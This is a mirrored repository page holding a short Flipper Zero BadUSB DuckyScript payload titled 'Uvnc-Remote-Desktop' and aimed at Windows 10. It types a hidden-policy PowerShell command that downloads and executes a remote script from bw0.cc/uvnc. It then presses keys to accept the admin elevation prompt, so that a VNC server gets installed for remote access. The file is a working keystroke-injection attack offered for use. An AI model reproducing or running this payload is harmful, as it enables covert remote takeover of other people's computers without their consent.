mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-12 07:40:44 -08:00
19 lines
489 B
Plaintext
19 lines
489 B
Plaintext
REM Title: Uvnc-Remote-Desktop
|
|
REM Author: @beigeworm | https://github.com/beigeworm
|
|
REM Description: Downloads Uvnc client to machine and runs winvnc.exe
|
|
REM Target: Windows 10
|
|
|
|
REM *REQUIREMENTS*
|
|
REM admin required for disable USB function.
|
|
|
|
REM some setup for dukie script.
|
|
DEFAULT_DELAY 100
|
|
|
|
REM open powershell (remove -W Hidden to show the window).
|
|
GUI r
|
|
DELAY 750
|
|
STRING powershell -Exec Bypass -C $ip = ''; iex (irm bw0.cc/uvnc)
|
|
CTRL-SHIFT ENTER
|
|
DELAY 2500
|
|
ALT y
|